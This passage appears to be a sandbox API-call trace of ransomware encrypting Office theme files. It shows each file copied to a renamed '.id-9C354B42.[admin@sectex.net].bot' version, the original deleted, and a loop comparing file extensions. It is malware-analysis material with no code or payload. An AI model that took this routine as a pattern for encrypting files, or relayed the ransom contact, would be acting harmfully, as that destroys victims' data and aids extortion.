	[0043.701] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.701] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\preview.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204
	[0043.703] GetLastError () returned 0x0
	[0043.703] ReadFile (in: hFile=0x1f4, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x5ad, lpOverlapped=0x0) returned 1
	[0043.704] WriteFile (in: hFile=0x204, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x5b0, lpOverlapped=0x0) returned 1
	[0043.705] ReadFile (in: hFile=0x1f4, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0043.705] WriteFile (in: hFile=0x204, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0043.705] SetEndOfFile (hFile=0x204) returned 1
	[0043.705] CloseHandle (hObject=0x204) returned 1
	[0043.705] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.705] SetEndOfFile (hFile=0x1f4) returned 1
	[0043.707] CloseHandle (hObject=0x1f4) returned 1
	[0043.707] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0043.707] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\preview.gif")) returned 1
	[0043.707] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72
	[0043.707] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72
	[0043.707] lstrlenW (lpString=".doc") returned 4
	[0043.707] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0043.707] lstrlenW (lpString=".docx") returned 5
	[0043.707] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0043.707] lstrlenW (lpString=".pdf") returned 4
	[0043.707] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0043.707] lstrlenW (lpString=".xls") returned 4
	[0043.707] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0043.707] lstrlenW (lpString=".xlsx") returned 5
	[0043.707] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0043.707] lstrlenW (lpString=".ppt") returned 4
	[0043.707] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0043.707] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72
	[0043.707] lstrlenW (lpString=".zip") returned 4
	[0043.707] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0043.707] lstrlenW (lpString=".rar") returned 4
	[0043.708] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0043.708] lstrlenW (lpString=".bz2") returned 4
	[0043.708] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0043.708] lstrlenW (lpString=".7z") returned 3
	[0043.708] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0043.708] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72
	[0043.708] lstrlenW (lpString=".dbf") returned 4
	[0043.708] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0043.708] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72
	[0043.708] lstrlenW (lpString=".1cd") returned 4
	[0043.708] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0043.708] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72
	[0043.708] lstrlenW (lpString=".jpg") returned 4
	[0043.708] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0043.708] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72
	[0043.708] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72
	[0043.708] lstrlenW (lpString=".doc") returned 4
	[0043.708] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0043.708] lstrlenW (lpString=".docx") returned 5
	[0043.708] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0043.708] lstrlenW (lpString=".pdf") returned 4
	[0043.708] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0043.708] lstrlenW (lpString=".xls") returned 4
	[0043.708] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0043.708] lstrlenW (lpString=".xlsx") returned 5
	[0043.708] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0043.708] lstrlenW (lpString=".ppt") returned 4
	[0043.708] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0043.708] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72
	[0043.708] lstrlenW (lpString=".zip") returned 4
	[0043.708] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0043.708] lstrlenW (lpString=".rar") returned 4
	[0043.708] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0043.708] lstrlenW (lpString=".bz2") returned 4
	[0043.708] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0043.708] lstrlenW (lpString=".7z") returned 3
	[0043.709] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0043.709] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72
	[0043.709] lstrlenW (lpString=".dbf") returned 4
	[0043.709] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0043.709] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72
	[0043.709] lstrlenW (lpString=".1cd") returned 4
	[0043.709] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0043.709] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72
	[0043.709] lstrlenW (lpString=".jpg") returned 4
	[0043.709] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0043.709] lstrcmpiW (lpString1=".PNG", lpString2=".bot") returned 1
	[0043.709] lstrlenW (lpString="THMBNAIL.PNG") returned 12
	[0043.709] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4
	[0043.710] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=25106) returned 1
	[0043.710] CloseHandle (hObject=0x1f4) returned 1
	[0043.710] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\thmbnail.png")) returned 0x20
	[0043.710] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0043.710] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4
	[0043.710] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.710] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.710] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204
	[0043.711] GetLastError () returned 0x0
	[0043.711] ReadFile (in: hFile=0x1f4, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x6212, lpOverlapped=0x0) returned 1
	[0043.712] WriteFile (in: hFile=0x204, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x6220, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x6220, lpOverlapped=0x0) returned 1
	[0043.714] ReadFile (in: hFile=0x1f4, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0043.714] WriteFile (in: hFile=0x204, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0043.714] SetEndOfFile (hFile=0x204) returned 1
	[0043.714] CloseHandle (hObject=0x204) returned 1
	[0043.714] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.714] SetEndOfFile (hFile=0x1f4) returned 1
	[0043.715] CloseHandle (hObject=0x1f4) returned 1
	[0043.715] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0043.715] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\thmbnail.png")) returned 1
	[0043.715] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73
	[0043.715] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73
	[0043.715] lstrlenW (lpString=".doc") returned 4
	[0043.715] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0043.715] lstrlenW (lpString=".docx") returned 5
	[0043.715] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0043.715] lstrlenW (lpString=".pdf") returned 4
	[0043.715] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0043.715] lstrlenW (lpString=".xls") returned 4
	[0043.716] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0043.716] lstrlenW (lpString=".xlsx") returned 5
	[0043.716] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0043.716] lstrlenW (lpString=".ppt") returned 4
	[0043.716] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0043.716] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73
	[0043.716] lstrlenW (lpString=".zip") returned 4
	[0043.716] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0043.716] lstrlenW (lpString=".rar") returned 4
	[0043.716] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0043.716] lstrlenW (lpString=".bz2") returned 4
	[0043.716] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0043.716] lstrlenW (lpString=".7z") returned 3
	[0043.716] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0043.716] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73
	[0043.716] lstrlenW (lpString=".dbf") returned 4
	[0043.716] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0043.716] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73
	[0043.716] lstrlenW (lpString=".1cd") returned 4
	[0043.716] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0043.716] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73
	[0043.716] lstrlenW (lpString=".jpg") returned 4
	[0043.716] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0043.716] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73
	[0043.716] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73
	[0043.716] lstrlenW (lpString=".doc") returned 4
	[0043.716] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0043.716] lstrlenW (lpString=".docx") returned 5
	[0043.716] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0043.716] lstrlenW (lpString=".pdf") returned 4
	[0043.716] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0043.716] lstrlenW (lpString=".xls") returned 4
	[0043.716] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0043.716] lstrlenW (lpString=".xlsx") returned 5
	[0043.716] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0043.716] lstrlenW (lpString=".ppt") returned 4
	[0043.717] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0043.717] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73
	[0043.717] lstrlenW (lpString=".zip") returned 4
	[0043.717] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0043.717] lstrlenW (lpString=".rar") returned 4
	[0043.717] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0043.717] lstrlenW (lpString=".bz2") returned 4
	[0043.717] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0043.717] lstrlenW (lpString=".7z") returned 3
	[0043.717] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0043.717] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73
	[0043.717] lstrlenW (lpString=".dbf") returned 4
	[0043.717] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0043.717] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73
	[0043.717] lstrlenW (lpString=".1cd") returned 4
	[0043.717] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0043.717] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73
	[0043.717] lstrlenW (lpString=".jpg") returned 4
	[0043.717] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0043.717] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0043.717] lstrlenW (lpString="PREVIEW.GIF") returned 11
	[0043.717] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4
	[0043.719] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=1347) returned 1
	[0043.719] CloseHandle (hObject=0x1f4) returned 1
	[0043.720] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\preview.gif")) returned 0x20
	[0043.720] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\preview.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0043.720] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4
	[0043.720] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.720] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.720] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\preview.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204
	[0043.722] GetLastError () returned 0x0
	[0043.722] ReadFile (in: hFile=0x1f4, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x543, lpOverlapped=0x0) returned 1
	[0043.723] WriteFile (in: hFile=0x204, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x550, lpOverlapped=0x0) returned 1
	[0043.724] ReadFile (in: hFile=0x1f4, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0043.724] WriteFile (in: hFile=0x204, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0043.724] SetEndOfFile (hFile=0x204) returned 1
	[0043.724] CloseHandle (hObject=0x204) returned 1
	[0043.724] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.724] SetEndOfFile (hFile=0x1f4) returned 1
	[0043.725] CloseHandle (hObject=0x1f4) returned 1
	[0043.725] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0043.725] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\preview.gif")) returned 1
	[0043.725] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75
	[0043.725] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75
	[0043.725] lstrlenW (lpString=".doc") returned 4
	[0043.725] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0043.725] lstrlenW (lpString=".docx") returned 5
	[0043.726] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0043.726] lstrlenW (lpString=".pdf") returned 4
	[0043.726] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0043.726] lstrlenW (lpString=".xls") returned 4
	[0043.726] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0043.726] lstrlenW (lpString=".xlsx") returned 5
	[0043.726] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0043.726] lstrlenW (lpString=".ppt") returned 4
	[0043.726] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0043.726] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75
	[0043.726] lstrlenW (lpString=".zip") returned 4
	[0043.726] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0043.726] lstrlenW (lpString=".rar") returned 4
	[0043.726] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0043.726] lstrlenW (lpString=".bz2") returned 4
	[0043.726] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0043.726] lstrlenW (lpString=".7z") returned 3
	[0043.726] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0043.726] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75
	[0043.726] lstrlenW (lpString=".dbf") returned 4
	[0043.726] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0043.726] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75
	[0043.726] lstrlenW (lpString=".1cd") returned 4
	[0043.726] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0043.726] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75
	[0043.726] lstrlenW (lpString=".jpg") returned 4
	[0043.726] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0043.726] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75
	[0043.726] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75
	[0043.726] lstrlenW (lpString=".doc") returned 4
	[0043.726] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0043.726] lstrlenW (lpString=".docx") returned 5
	[0043.726] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0043.726] lstrlenW (lpString=".pdf") returned 4
	[0043.726] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0043.727] lstrlenW (lpString=".xls") returned 4
	[0043.727] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0043.727] lstrlenW (lpString=".xlsx") returned 5
	[0043.727] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0043.727] lstrlenW (lpString=".ppt") returned 4
	[0043.727] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0043.727] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75
	[0043.727] lstrlenW (lpString=".zip") returned 4
	[0043.727] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0043.727] lstrlenW (lpString=".rar") returned 4
	[0043.727] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0043.727] lstrlenW (lpString=".bz2") returned 4
	[0043.727] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0043.727] lstrlenW (lpString=".7z") returned 3
	[0043.727] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0043.727] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75
	[0043.727] lstrlenW (lpString=".dbf") returned 4
	[0043.727] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0043.727] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75
	[0043.727] lstrlenW (lpString=".1cd") returned 4
	[0043.727] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0043.727] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75
	[0043.727] lstrlenW (lpString=".jpg") returned 4
	[0043.727] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0043.727] lstrcmpiW (lpString1=".PNG", lpString2=".bot") returned 1
	[0043.727] lstrlenW (lpString="THMBNAIL.PNG") returned 12
	[0043.727] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4
	[0043.728] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=32403) returned 1
	[0043.728] CloseHandle (hObject=0x1f4) returned 1
	[0043.728] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\thmbnail.png")) returned 0x20
	[0043.728] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
